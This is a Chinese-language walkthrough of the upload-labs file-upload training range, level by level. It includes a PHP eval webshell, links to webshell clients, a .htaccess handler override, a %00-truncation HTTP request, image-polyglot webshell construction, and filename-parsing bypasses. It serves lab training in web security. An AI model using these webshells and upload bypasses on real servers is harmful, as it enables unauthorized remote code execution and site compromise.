靶场地址

1
https://github.com/c0ny1/upload-labs

一句话

1
<?php @eval($_POST[123]);?>

WebShell连接工具

中国蚁剑

1
https://github.com/AntSwordProject/antSword

AntSword 加载器

1
https://github.com/AntSwordProject/AntSword-Loader

菜刀

Pass-01

  1. 写一个一句话文件,后缀改成允许上传的文件类型
  2. bp抓包,把后缀改成.php
  3. 蚁剑连接

    Pass-02

  • 新建后缀.php的文件
  • bp抓包
  • 将Content-Type修改为允许上传的类型(image/jpeg、image/png、image/gif)三选一

    Pass-03

  • 黑名单验证
  • 如果黑名单定义不完整的话是可以实现绕过的,用.phtml .phps .php5 .pht进行绕过。这里我们直接上传一个.php5文件
  • 因为上传上去的文件名会改变,bp抓包数据包中有回显,所以我们还是可以访问的。

    注意

  • 要在apache的httpd.conf中有如下配置代码:AddType application/x-httpd-php .php .phtml .phps .php5 .pht,如果不配置他是无法解析php5代码的,访问的时候就是一个空白页

    Pass-04

  • 可以看到禁止上传文件太多了
  • 首先创建一个.htaccess文件,里面写上代码
    1
    2
    3
    <FilesMatch "1.png">
    SetHandler application/x-httpd-php
    </FilesMatch>
  • 这串代码的意思是如果文件中有一个1.png的文件,他就会被解析为.php.
  • 再上传一个1.png的文件就能访问了

    注意

    .htaccess文件不能起名字,他就是.htaccess文件,如果你将他改为1.htaccess或者其他的什么名字是不可以的,无法解析。在实战中有可能上传上去这个文件会被自动重命名,被重命名了就不可以了。

    Pass-05

  • 这一关没有强制将大写转换为小写,所以我们可以上传纯大写或者大小写结合的后缀名
  • 直接上传一个后缀名为.PHP的文件,上传后或自动改名字bp抓包可以看见
  • 我们可以看到上传成功,访问

    Pass-06

    注意

  • Win下xx.jpg空格xx.jpg.两种文件是不被允许存在的,要是这样命名文件,windows系统会默认删除空格或者.
  • 我们用burp抓包将filename=”12345.php”改为filename=”12345.php “(12345.php空格)

    Pass-07

  • 和第七关思路一样,就是把空格换成点

    Pass-08

  • Windows本地文件系统中的文件流(File Streams):
    当从 Windows shell 命令行指定创建文件时,流的完整名称为 “filename:stream name:stream type”,如示例中所示: “myfile.txt:stream1:$DATA”
  • 和上一关一样,直接上传,在数据包的php后面直接加上::$DATA

    Pass-09

  • 这一关的思路是它没有循环验证,也就是说这些收尾去空,删除末尾的点,去除字符串::$DATA,转换为小写这些东西只是验证了一次。
  • 所以我们的绕过思路就很简单,在数据包中把后缀名改为.php. .

    Pass-10

  • 将文件名改为.pphphphpp

    Pass-11

    1
    2
    3
    POST /upload-labs/Pass-11/index.php?save_path=../upload/%00 HTTP/1.1

    Content-Disposition: form-data; name="upload_file"; filename="pi .jpg"
  • 但是有环境限制: php版本要小于5.3.4,5.3.4及以上magic_quotes_gpc需要为OFF状态

    Pass-12

    跟上一关产不多 只不过是接受值变成了post,她两的差别呢就是get会自行解码,post不会自行解码,我们需要对%00进行编码,选中%00右键

    Pass-13

  • 图片+php代码,组成一个图片码进行上传
  • 首先制作一个图片码,可以直接用Notepad直接打开图片后面加一个php代码,但是需要16进制,要不然图片可能出错。
  • 也可以cmd进行生成,命令语句:copy i.jpg /b + pi.php /a webshell.jpg
  • upload-labs/include.php?file=upload/6520220814071149.png

    Pass-14

  • getimagesize函数,这个函数的意思是:会对目标文件的16进制去进行一个读取,去读取头几个字符串是不是符合图片的要求的
  • 这关还是用和上关一样的方法,生成带有php代码的图片上传,配合包含漏洞拿下此关。

    Pass-15

  • 第15关同14,13关思路一样,操作一样。但是需要打开php_exif,
  • exif_imagetype() 读取一个图像的第一个字节并检查其签名。

    Pass-16

    本关综合判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后对图片再做了一次二次渲染重新创建,所以在上传图片马的时候将上传后的图片马下载下来进行查看,看看它经过而渲染后的图片中的那些数据没有改变,可以通过16进制编辑器查看,然后我们在这些没有变的地方插入一句话,这样就可以成功上传了。之后的操作与之前的关卡一样

    Pass-17

    本关考察的是条件竞争 通过白名单检测后缀名,符合就rename改名,不符合就unlink删除文件 可以用burp来发包不断访问,先写一个php写入文件的1.php然后在不断访问这文件就可以看到我们上传的东西了,而且在访问这文件就可以生成另外一个shell了(通过马生成的)

    Pass-18

    和上一关几乎一模一样

    Pass-19

    本关考察CVE-2015-2348 move_uploaded_file() 00截断,上传webshell,同时自定义保存名称,直接保存为php是不行的,查看源码发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过

    Pass-20

    通过查看源码可以发现:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    $file_name经过reset($file) . '.' . $file[count($file) - 1];处理。

    如果上传的是数组的话,会跳过$file = explode('.', strtolower($file));。

    并且后缀有白名单过滤:

    $ext = end($file); $allow_suffix = array('jpg','png','gif');

    而最终的文件名后缀取的是$file[count($file) - 1],因此我们可以让$file为数组。

    $file[0]为smi1e.php/,也就是reset($file),然后再令$file[2]为白名单中的jpg。

    此时end($file)等于jpg,$file[count($file) - 1]为空。

    而 $file_name = reset($file) . '.' . $file[count($file) - 1];,也就是smi1e.php/.,最终move_uploaded_file会忽略掉/.,最终上传smi1e.php。